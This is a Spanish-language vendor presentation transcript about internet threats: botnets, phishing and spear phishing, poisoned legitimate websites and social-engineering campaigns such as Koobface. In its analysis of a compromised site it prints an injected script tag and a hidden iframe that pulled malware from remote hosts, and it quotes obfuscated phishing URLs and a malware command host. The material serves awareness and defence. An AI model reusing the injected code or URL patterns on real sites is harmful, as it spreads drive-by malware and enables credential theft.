Descargar documento Adjunto
Transcripción
Descargar documento Adjunto
Conceptos y tendencias de las últimas amenazas en Internet hacia los usuarios Luis Fernando Garzón Product Sales Specialist [email protected] Agenda • El nuevo ambiente • Los Botnets estan cambiando • Amenazas en la web • Típico ataque de phishing • Sitios legales envenenados • Tecnicas de Ingeniería Social El nuevo ambiente Nuevas motivaciones generan nuevas amenazas Ataques dirigidos Ataque Global - Dinero Ganado Ataque Dirigido + Dinero Ganado Ataque dirigido + Ataque secuencial Antes Ahora Damage Damage Worm Downloader 1 Downloader 2 Variant A, B, C Trojan Spyware Worm Time Time Threats Borg Queen Botnet Típica Borg Drones Envía ordenes Bot Herder IRC Server O DNS Server WebServer BotNet Botnets estan cambiando La primera “nueva generación” de botnet 1000 PCs arrendados a $220 la hora en Alemania 1000 PCs arrendados en USA $110 la hora Soporte disponible Auto-expanción: Spam Coordinado: Sincroniza email con URLs Peer-to-Peer: Usa P2P para comunicarse Spam Engines (SMTP) Landing pages (HTTP) Amenazas en la web Incremento en la amenazas web • El panorama general del mercado de malware se desplaza cada vez más hacia los ataques que utilizan http o hhtps como medio de infección en colaboración con los resursos ya existentes. E-Mail Vector Web Vector Malware & Spyware are the hidden enemy Hechos sobre comunidades virtuales y redes sociales • 57% de los usuarios de sitios de redes sociales revelan información crítica que no revelarían de ninguna otra forma. • 83% de los usuarios descargan archivos de otros perfiles aún sin estar seguros de su contenido • 51% de los padres que saben que sus hijos utilizan redes sociales no restringen los perfiles de sus hijos a posibles atacantes • 36% de esos padres, ni siquiera monitorean la actividad de sus hijos en estas redes National Cyber Security Alliance (NCSA) Second social networking study, Oct 2010 Los adolescentes y las redes sociales • 55% de los adolescentes en línea han creado un perfil personal en línea y 55% de ellos ha usado sitios como MySpace o Facebook • 66% de los que han creado un perfil dicen que su perfil no es público • 48% de los adolescentes visitan su perfil una o más veces al día, 22% lo visitan varias veces al día • Las adolescentes de entre 15 y 17 años son mucho más activas que el resto de los adolescentes. • La mayoría de los adolescentes utilizan estas redes para estar en contacto con amigos. • Solo el 17% de los adolescentes utilizan estas redes para obtener una cita o una relación amorosa. Tipico ataque de phishing 1 Obtener una lista de mails (hackeada/Comprada) 2 Construir el website & registrar el dominio 3 Enviar millones de phish mails a la lista “Bot-net” SMTP Port 25 MAIL FROM [email protected] RCPT TO [email protected] SMTP Port 25 MAIL FROM [email protected] RCPT TO [email protected] 4 4 Esperar por cuentas/passwords y retirar el dinero Nuevos Cambios Envenamiento DNS Cache Ingenieria Social Nuevo record alcanzado en 2009 2/3 de sitios de pishing infecta al host Promedio del tiempo de vida: 3 días Source : Anti-Phishing Working Group Fortune 500 Phishing Spear Phishing en Supervalu Supervalu Food - Fortune 117 • Supervalu transfiere fondos a los proveedores diariamente por los items vendidos en las tiendas • El criminal obtiene las instrucciones de la transferencia electronica para American Greetings y Frito-Lay, proveedores de Supervalu • Criminal envia emails con nueva documentación para nuevas transferencias electrónicas • $10M transferidos por Supervalu al criminal sobre cuatro días • http://www.computerworld.com/action/article.do?command=viewAr ticleBasic&articleId=9043618&source=NLT_AM&nlid=1 Los expertos dicen…… “Waves of targeted email attacks, often called spear phishing, are exploiting client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office. This is currently the primary initial infection vector used to compromise computers that have Internet access.” SANS Top Cyber Security Risks Sitios legales envenenados Sobre el 87% de todas las amenazas web hoy estan usando sites envenenados* 9 de 10 web sites vulnerables son** Tecnicas usadas: iFrame attacks No puede ser asegurado con una solución de URL Filtering *Source: Cisco TOC **Source: White Hat Security, Website Sec Statistics Report 10/2007 ¿Qué son los iFRAMEs? • Los iFrames ayudan a insertar una pagina web dentro de otra con mayor control que usando los "frames" tradicionales. • Ya no se necesita tener una pagina que defina los frames. Surprise Valley, Idaho 18 19 Que esta sucediendo en BrookeSeidl.com • brookeseidl.com registrado en Nom 2002 • 63.249.17.64 hosted en Seattle’s ZipCon con 52 subdominios Script injectado dentro de laweb page – Ingrediente extra!! Que hace Tejary.net/h.js? • Browser entrega h.js javascript de tejary.net • Tejary.net registered 2003 en GoDaddy and hosted on 68.178.160.68 in Arizona • Registrado por Aljuraid, Mr Nassir A en Arabia Saudita • Tejary.net/h.js llama a dos objetos de iframe remotos Que hace said7.com? • • • • • • Browser entrega /Bb/faq.htm de www.said7.com Said7.com Registrado en 2006 en NAMESECURE.COM Hosteado en 74.52.143.60 en ThePlanet, Houston, TX Hace un llamado web de 51yes.com Llama a v3i9.cn/c.htm como iFrame <script language="javascript" src="http://count49.51yes.com/click.aspx?id=494953024&logo=11">< /script> <iframe src=http://www.v3i9.cn/c.htm width=100 height=0></iframe> V3i9.cn Información del Dominio • V3i9.cn registrado en por el día 3/25/09. DNS por mysuperdns.com • Hosted en 216.245.201.208 en Limestone Networks en Dallas, TX • Entrega los objetos ipp.htm, real.html, real.js 14.htm, 14.Js flash.htm, igg.htm Cual es nuestro malware? • Despues de instalar el archivo proveniente de v3i9.cn y ejecutarlo, explota vulnerabilidades en MDAC, RDS.dataspacectiveX que controla el modelo de seguridad de activeX y RDS.dataspace puede crear archivos locales sin asunto para verificación de seguridad • Descarga ce.exe, Gh0st malware • GhostNet establece conexiones persistentes con un host en China 58.253.68.68 vobe.3322.org Anti-Virus no nos protege • Ce.exe analizado en Virus Total 31% de detección en dia 1y2 48% detección dia 3 Tecnicas de Ingenieria Social 1. Spam con URL 2. Search Engines 3. Instant Messaging 4. Ataques a redes sociales 1. Spam con URL Contenido actual con interes publico Email enviado a usuarios con un link a sitios web maliciosos Web-site descarga un malware al usuario del PC Ejemplo: Victoria de Barack Obama Usuarios reciven un email invitandolos a ver el discurso de victoria de Barack Obama Usuarios son enlazados a un botsite Ejemplos de Asuntos: - Election Results Winner - The New President’s Cabinet? http://slapiservlet.encrypted.viewcontent.XXXXXXXXXXXXXXX.wconlinenrue.com/president.htm?/slapiservlet/slapiservlet/OSL.htm?LOGIN=BfQd3Zno5H&VERI FY=0AHBgl9ixN7rvXm http://portalserver.viewcontent.memberverify.EwTLOC5Rc.XXXXXXXXXXXXXXX.bfiinwach.com/president.htm?/verifyonenet/certificateupdate/OSL.htm?LOGIN= ZeuroEwTLO&VERIFY=C5Rcwjj7qjsuVeb http://actionvalidate.linkbrowse.servletdologin.QdfFSKkiw.XXXXXXXXXXXXXXX/president.htm?/exacttrget/memberverify/OSL.htm?LOGIN=Tch0JQdfFS&VERIF Y=KkiwFDDIWZhvVNJ Malicious URLs Ejemplo: Victoria de Barack Obama BOTSITE REAL SITE • Usuarios se les pregunta para instalar un Flash Player update, el cual esy data-stealing malware • Roba screen shots, passwords and envia a un web server localizado en Kiev, Ukraine 2. Uso de motores de busqueda • Anti-spyware engine “noadware” is a spyware agent 3. Instant Messaging Ejemplo: Mi propio amigo en MSN 4. Social Networking Exploits • La herramienta más importante de la decada en comunicaciones. Basado en email, IM. • Grandes Grupos = Grandes Objetivos. Facebook alcanzó 350M usuarios en 2009. • …y los cibercriminales han automatizado el como penetrar estas redes “confiables” Entregando todo juntos …Koobface • Links son enviados desde una cuenta hackeada • El link dirige al usuario final al un sitios para descargar un Flash update o codec Koobface Worm robando datos….. • Usuarios se les pregunta para instalar un Adobe Flash Player update, el cual es data-stealing malware • Una vez que el malware es instalado, este graba datos sensibles de los PC de los usuarios como números de tarjeta de crédito. Estafa en redes sociales…… Mejores prácticas antes de hacer click en un link • Utilizar un sistema de reputación de web en tiempo real que nos ayude a determinar la peligrosidad de cada link • Si un link es sospechoso, no haga click, abra su navegador y escriba el link directamente • No haga clicks en links en correos recibidos de una institución financiera aunque parezcan reales. • Siempre verifique la autenticidad del sitio antes de hacer click • Utilice un software de protección que pueda detectar proactivamente las variantes del malware • Actualice sus parches de sistema operativo y aplicaciones • Manténgase informado